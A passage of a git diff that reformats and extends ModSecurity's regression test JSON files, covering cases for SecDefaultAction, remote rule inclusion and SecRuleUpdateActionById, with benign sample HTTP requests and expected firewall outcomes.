"" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Response Content-Type is text/html. It is not marked to be inspected." + "expected": { + "debug_log": "Response Content-Type is text/html. It is not marked to be inspected.", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecResponseBodyAccess On", - "SecResponseBodyMimeType text\/plain text\/tml text\/xml", + "SecResponseBodyMimeType text/plain text/tml text/xml", "SecResponseBodyMimeTypesClear", "SecRule RESPONSE_BODY \"@contains RESPONSE_CONTENT_TYPE\" \"id:9,pass,t:trim,phase:4\"" ] } - - ] diff --git a/test/test-cases/regression/config-secdefaultaction.json b/test/test-cases/regression/config-secdefaultaction.json index bb3d7d8104..ce58f20ca2 100644 --- a/test/test-cases/regression/config-secdefaultaction.json +++ b/test/test-cases/regression/config-secdefaultaction.json @@ -1,57 +1,58 @@ [ { - "enabled":1, - "version_min":300000, - "version_max":0, - "title":"Testing action :: SecDefaultAction: supporting transformation", - "client":{ - "ip":"200.249.12.31", - "port":2313 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "User-Agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", - "Accept-Language":"en-us,en;q=0.5", - "Accept-Encoding":"gzip,deflate", - "Accept-Charset":"ISO-8859-1,utf-8;q=0.7,*;q=0.7", - "Keep-Alive":"300", - "Connection":"keep-alive", - "Cookie":"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Pragma":"no-cache", - "Cache-Control":"no-cache" + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing action :: SecDefaultAction: supporting transformation", + "client": { + "ip": "200.249.12.31", + "port": 2313 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-us,en;q=0.5", + "Accept-Encoding": "gzip,deflate", + "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", + "Keep-Alive": "300", + "Connection": "keep-alive", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Pragma": "no-cache", + "Cache-Control": "no-cache" }, - "uri":"\/test.pl?param1= test ¶m2=test2", - "method":"GET", - "http_version":1.1, - "body":"" - }, - "response":{ - "headers":{ - "Content-Type":"text\/xml; charset=utf-8\n\r", - "Content-Length":"length\n\r" + "uri": "/test.pl?param1= test ¶m2=test2", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "length\n\r" }, - "body":[ + "body": [ "\n\r", - "\n\r", + "\n\r", " \n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, - "expected":{ - "audit_log":"", - "debug_log":"lowercase: \"300\"", - "error_log":"" + "expected": { + "debug_log": "lowercase: \"300\"", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecDefaultAction \"phase:2,t:lowercase,pass\"", "SecRule REQUEST_HEADERS \"@contains PHPSESSID\" \"phase:2,id:1,msg:'This is a test, %{REQUEST_HEADERS:Accept}%'\"", @@ -59,58 +60,59 @@ ] }, { - "enabled":1, - "version_min":300000, - "version_max":0, - "title":"Testing action :: SecDefaultAction: supporting transformation + t:none", - "client":{ - "ip":"200.249.12.31", - "port":2313 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "User-Agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", - "Accept-Language":"en-us,en;q=0.5", - "Accept-Encoding":"gzip,deflate", - "Accept-Charset":"ISO-8859-1,utf-8;q=0.7,*;q=0.7", - "Keep-Alive":"300", - "Connection":"keep-alive", - "Cookie":"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Pragma":"no-cache", - "Cache-Control":"no-cache" + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing action :: SecDefaultAction: supporting transformation + t:none", + "client": { + "ip": "200.249.12.31", + "port": 2313 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-us,en;q=0.5", + "Accept-Encoding": "gzip,deflate", + "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", + "Keep-Alive": "300", + "Connection": "keep-alive", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Pragma": "no-cache", + "Cache-Control": "no-cache" }, - "uri":"\/test.pl?param1= test ¶m2=test2", - "method":"GET", - "http_version":1.1, - "body":"" - }, - "response":{ - "headers":{ - "Content-Type":"text\/xml; charset=utf-8\n\r", - "Content-Length":"length\n\r" + "uri": "/test.pl?param1= test ¶m2=test2", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "length\n\r" }, - "body":[ + "body": [ "\n\r", - "\n\r", + "\n\r", " \n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, - "expected":{ - "audit_log":"", - "debug_log":" Target value: \"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120\" ", - "error_log":"" + "expected": { + "debug_log": " Target value: \"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120\" ", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecDefaultAction \"phase:2,t:lowercase,pass\"", "SecRule REQUEST_HEADERS \"@contains PHPSESSID\" \"t:none,phase:2,id:1,msg:'This is a test, %{REQUEST_HEADERS:Accept}%'\"", @@ -118,14 +120,41 @@ ] }, { - "enabled":1, - "version_min":300000, - "version_max":0, - "title":"Testing action :: SecDefaultAction: t:none", - "expected":{ - "parser_error":"The transformation none is not suitable to be part of the SecDefaultActions" - }, - "rules":[ + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing action :: SecDefaultAction: t:none", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + + }, + "uri": "", + "method": "", + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "http_code": 200, + "parser_error": "The transformation none is not suitable to be part of the SecDefaultActions" + }, + "rules": [ "SecRuleEngine On", "SecDefaultAction \"phase:2,t:none\"", "SecRule REQUEST_HEADERS \"@contains PHPSESSID\" \"t:none,phase:2,id:1,msg:'This is a test, %{REQUEST_HEADERS:Accept}%'\"", @@ -133,58 +162,59 @@ ] }, { - "enabled":1, - "version_min":300000, - "version_max":0, - "title":"Testing action :: SecDefaultAction: simple test", - "client":{ - "ip":"200.249.12.31", - "port":2313 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "User-Agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", - "Accept-Language":"en-us,en;q=0.5", - "Accept-Encoding":"gzip,deflate", - "Accept-Charset":"ISO-8859-1,utf-8;q=0.7,*;q=0.7", - "Keep-Alive":"300", - "Connection":"keep-alive", - "Cookie":"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Pragma":"no-cache", - "Cache-Control":"no-cache" + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing action :: SecDefaultAction: simple test", + "client": { + "ip": "200.249.12.31", + "port": 2313 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-us,en;q=0.5", + "Accept-Encoding": "gzip,deflate", + "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", + "Keep-Alive": "300", + "Connection": "keep-alive", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Pragma": "no-cache", + "Cache-Control": "no-cache" }, - "uri":"\/test.pl?param1= test ¶m2=test2", - "method":"GET", - "http_version":1.1, - "body":"" - }, - "response":{ - "headers":{ - "Content-Type":"text\/xml; charset=utf-8\n\r", - "Content-Length":"length\n\r" + "uri": "/test.pl?param1= test ¶m2=test2", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "length\n\r" }, - "body":[ + "body": [ "\n\r", - "\n\r", + "\n\r", " \n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, - "expected":{ - "audit_log":"", - "debug_log":"Saving msg: This is a test, text\/html,application", - "error_log":"" + "expected": { + "debug_log": "Saving msg: This is a test, text/html,application", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecDefaultAction \"phase:2,log,auditlog,pass\"", "SecRule REQUEST_HEADERS \"@contains PHPSESSID\" \"id:1,t:lowercase,t:none,msg:'This is a test, %{REQUEST_HEADERS:Accept}%'\"", @@ -192,30 +222,83 @@ ] }, { - "enabled":1, - "version_min":300000, - "version_max":0, - "title":"Testing action :: SecDefaultAction: action not suitable", - "expected":{ - "parser_error":"The action 'id' is not suitable to be part of the SecDefaultActions" - }, - "rules":[ + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing action :: SecDefaultAction: action not suitable", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + + }, + "uri": "", + "method": "", + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "http_code": 200, + "parser_error": "The action 'id' is not suitable to be part of the SecDefaultActions" + }, + "rules": [ "SecRuleEngine On", "SecDefaultAction \"phase:2,id:1,log,auditlog,pass,tag:'teste'\"", - "SecRule REQUEST_HEADERS \"@contains PHPSESSID\" \"id:1,tag:'teste',t:lowercase,t:none,msg:'This is a test, %{REQUEST_HEADERS:Accept}%'\"", "SecRule TX \"@contains to_test\" \"id:2,t:lowercase,t:none\"" ] }, { - "enabled":1, - "version_min":300000, - "version_max":0, - "title":"Testing action :: SecDefaultAction: twice", - "expected":{ - "parser_error":"SecDefaultActions can only be placed once per phase and configuration context. Phase 2 was informed already." - }, - "rules":[ + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing action :: SecDefaultAction: twice", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + + }, + "uri": "", + "method": "", + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "http_code": 200, + "parser_error": "SecDefaultActions can only be placed once per phase and configuration context. Phase 2 was informed already." + }, + "rules": [ "SecRuleEngine On", "SecDefaultAction \"phase:2,log,auditlog,pass,tag:'teste'\"", "SecDefaultAction \"phase:2,log,auditlog,pass,tag:'teste'\"", @@ -224,58 +307,59 @@ ] }, { - "enabled":1, - "version_min":300000, - "version_max":0, - "title":"Testing action :: SecDefaultAction: status + redirect", - "client":{ - "ip":"200.249.12.31", - "port":2313 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "User-Agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", - "Accept-Language":"en-us,en;q=0.5", - "Accept-Encoding":"gzip,deflate", - "Accept-Charset":"ISO-8859-1,utf-8;q=0.7,*;q=0.7", - "Keep-Alive":"300", - "Connection":"keep-alive", - "Cookie":"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Pragma":"no-cache", - "Cache-Control":"no-cache" + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing action :: SecDefaultAction: status + redirect", + "client": { + "ip": "200.249.12.31", + "port": 2313 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-us,en;q=0.5", + "Accept-Encoding": "gzip,deflate", + "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", + "Keep-Alive": "300", + "Connection": "keep-alive", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Pragma": "no-cache", + "Cache-Control": "no-cache" }, - "uri":"\/test.pl?param1= test ¶m2=test2", - "method":"GET", - "http_version":1.1, - "body":"" - }, - "response":{ - "headers":{ - "Content-Type":"text\/xml; charset=utf-8\n\r", - "Content-Length":"length\n\r" + "uri": "/test.pl?param1= test ¶m2=test2", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "length\n\r" }, - "body":[ + "body": [ "\n\r", - "\n\r", + "\n\r", " \n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, - "expected":{ - "audit_log":"", - "debug_log":"Request was relevant to be saved.", + "expected": { + "debug_log": "Request was relevant to be saved.", "http_code": 302 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecDefaultAction \"phase:2,log,auditlog,status:302,redirect:'http://www.google.com'\"", "SecRule REQUEST_HEADERS \"@contains PHPSESSID\" \"phase:2,id:1,block\"", diff --git a/test/test-cases/regression/config-secremoterules.json b/test/test-cases/regression/config-secremoterules.json index 5065e06b64..ce86bd3d7a 100644 --- a/test/test-cases/regression/config-secremoterules.json +++ b/test/test-cases/regression/config-secremoterules.json @@ -1,95 +1,130 @@ [ { - "enabled":1, - "version_min":300000, + "enabled": 1, + "version_min": 300000, + "title": "Include remote rules", "resource": "curl", - "title":"Include remote rules", - "client":{ - "ip":"200.249.12.31", - "port":123 + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Executing operator \"PmFromFile\" with param \".*\" against REQUEST_FILENAME" + "expected": { + "debug_log": "Executing operator \"PmFromFile\" with param \".*\" against REQUEST_FILENAME", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRemoteRules key https://raw.githubusercontent.com/owasp-modsecurity/ModSecurity/refs/heads/v3/master/test/modsecurity-regression-rules.txt", "SecRule ARGS \"@contains somethingelse\" \"id:9,pass,t:trim\"" ] }, { - "enabled":1, + "enabled": 1, + "version_min": 300000, + "title": "Include remote rules - failed download (Abort)", "resource": "curl", - "version_min":300000, - "title":"Include remote rules - failed download (Abort)", - "expected":{ + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + + }, + "uri": "", + "method": "", + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "http_code": 200, "parser_error": "Failed to download" }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRemoteRulesFailAction Abort", "SecRemoteRules key https://gist.githubusercontent.com/zimmerle/a4c1ec028999f7df71d0cc80f4f271ca/raw/4c74363bf4eae974180f1a82007196e58729dd16/modsecurity-regression-test-secremoterules-bonga.txt" ] }, { - "enabled":1, + "enabled": 1, + "version_min": 300000, + "title": "Include remote rules - failed download (Warn)", "resource": "curl", - "version_min":300000, - "title":"Include remote rules - failed download (Warn)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log":"Executing operator \"Contains\" with param \"somethingelse\" against ARGS." + "expected": { + "debug_log": "Executing operator \"Contains\" with param \"somethingelse\" against ARGS.", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRemoteRulesFailAction Warn", "SecRemoteRules key https://gist.githubusercontent.com/zimmerle/a4c1ec028999f7df71d0cc80f4f271ca/raw/4c74363bf4eae974180f1a82007196e58729dd16/modsecurity-regression-test-secremoterules-bonga.txt", diff --git a/test/test-cases/regression/config-update-action-by-id.json b/test/test-cases/regression/config-update-action-by-id.json index 4e1a3fc24e..606ea921b8 100644 --- a/test/test-cases/regression/config-update-action-by-id.json +++ b/test/test-cases/regression/config-update-action-by-id.json @@ -1,272 +1,288 @@ [ { - "enabled":1, - "version_min":300000, - "title":"SecRuleUpdateActionById (1/n)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "SecRuleUpdateActionById (1/n)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"application/lhebs", - "Expect":"100-continue" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "330", + "Content-Type": "application/lhebs", + "Expect": "100-continue" }, - "uri":"/a=urlencoded?param1=value1", - "method":"GET" + "uri": "/a=urlencoded?param1=value1", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "http_code": 200, - "debug_log": "Skipped rule id '200005'" + "expected": { + "debug_log": "Skipped rule id '200005'", + "http_code": 200 }, - "rules":[ - "SecRuleEngine On", - "SecRuleUpdateActionById 200004 \"allow\"", - "SecRule ARGS \"@contains value1\" \"phase:3,id:200004,deny\"", - "SecRule ARGS \"@contains value1\" \"phase:3,id:200005,log\"" + "rules": [ + "SecRuleEngine On", + "SecRuleUpdateActionById 200004 \"allow\"", + "SecRule ARGS \"@contains value1\" \"phase:3,id:200004,deny\"", + "SecRule ARGS \"@contains value1\" \"phase:3,id:200005,log\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"SecRuleUpdateActionById (2/n)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "SecRuleUpdateActionById (2/n)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"application/lhebs", - "Expect":"100-continue" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "330", + "Content-Type": "application/lhebs", + "Expect": "100-continue" }, - "uri":"/a=urlencoded?param1=value1", - "method":"GET" + "uri": "/a=urlencoded?param1=value1", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ + "expected": { "http_code": 403 }, - "rules":[ - "SecRuleEngine On", - "SecRule ARGS \"@contains value1\" \"phase:3,id:200004,deny\"" + "rules": [ + "SecRuleEngine On", + "SecRule ARGS \"@contains value1\" \"phase:3,id:200004,deny\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"SecRuleUpdateActionById (3/n)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "SecRuleUpdateActionById (3/n)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"application/lhebs", - "Expect":"100-continue" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "330", + "Content-Type": "application/lhebs", + "Expect": "100-continue" }, - "uri":"/a=urlencoded?param1=value1", - "method":"GET" + "uri": "/a=urlencoded?param1=value1", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "http_code": 200, - "debug_log": "Running action: log" + "expected": { + "debug_log": "Running action: log", + "http_code": 200 }, - "rules":[ - "SecRuleEngine On", - "SecRuleUpdateActionById 200004 \"pass\"", - "SecRule ARGS \"@contains value1\" \"phase:3,id:200004,deny\"", - "SecRule ARGS \"@contains value1\" \"phase:3,id:200005,log\"" + "rules": [ + "SecRuleEngine On", + "SecRuleUpdateActionById 200004 \"pass\"", + "SecRule ARGS \"@contains value1\" \"phase:3,id:200004,deny\"", + "SecRule ARGS \"@contains value1\" \"phase:3,id:200005,log\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"SecRuleUpdateActionById (4/n)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "SecRuleUpdateActionById (4/n)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"application/lhebs", - "Expect":"100-continue" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "330", + "Content-Type": "application/lhebs", + "Expect": "100-continue" }, - "uri":"/a=urlencoded?param1=value1", - "method":"GET" + "uri": "/a=urlencoded?param1=value1", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "http_code": 200, - "debug_log": "Running action: log" + "expected": { + "debug_log": "Running action: log", + "http_code": 200 }, - "rules":[ - "SecRuleEngine On", - "SecRuleUpdateActionById 200004 \"pass\"", - "SecDefaultAction \"phase:3,deny\"", - "SecRule ARGS \"@contains value1\" \"phase:3,id:200004,block\"", - "SecRule ARGS \"@contains value1\" \"phase:3,id:200005,log\"" + "rules": [ + "SecRuleEngine On", + "SecRuleUpdateActionById 200004 \"pass\"", + "SecDefaultAction \"phase:3,deny\"", + "SecRule ARGS \"@contains value1\" \"phase:3,id:200004,block\"", + "SecRule ARGS \"@contains value1\" \"phase:3,id:200005,log\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"SecRuleUpdateActionById (5/n)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "SecRuleUpdateActionById (5/n)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"application/lhebs", - "Expect":"100-continue" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "330", + "Content-Type": "application/lhebs", + "Expect": "100-continue" }, - "uri":"/a=urlencoded?param1=value1", - "method":"GET" + "uri": "/a=urlencoded?param1=value1", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "http_code": 200, - "debug_log": "Dropping the evaluation of upcoming rules in favor of" + "expected": { + "debug_log": "Dropping the evaluation of upcoming rules in favor of", + "http_code": 200 }, - "rules":[ - "SecRuleEngine On", - "SecRuleUpdateActionById 200004 \"allow\"", - "SecDefaultAction \"phase:3,deny\"", - "SecRule ARGS \"@contains value1\" \"phase:3,id:200004,block\"", - "SecRule ARGS \"@contains value1\" \"phase:3,id:200005,log\"" + "rules": [ + "SecRuleEngine On", + "SecRuleUpdateActionById 200004 \"allow\"", + "SecDefaultAction \"phase:3,deny\"", + "SecRule ARGS \"@contains value1\" \"phase:3,id:200004,block\"", + "SecRule ARGS \"@contains value1\" \"phase:3,id:200005,log\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"SecRuleUpdateActionById (6/n)", - "issue":"2005", - 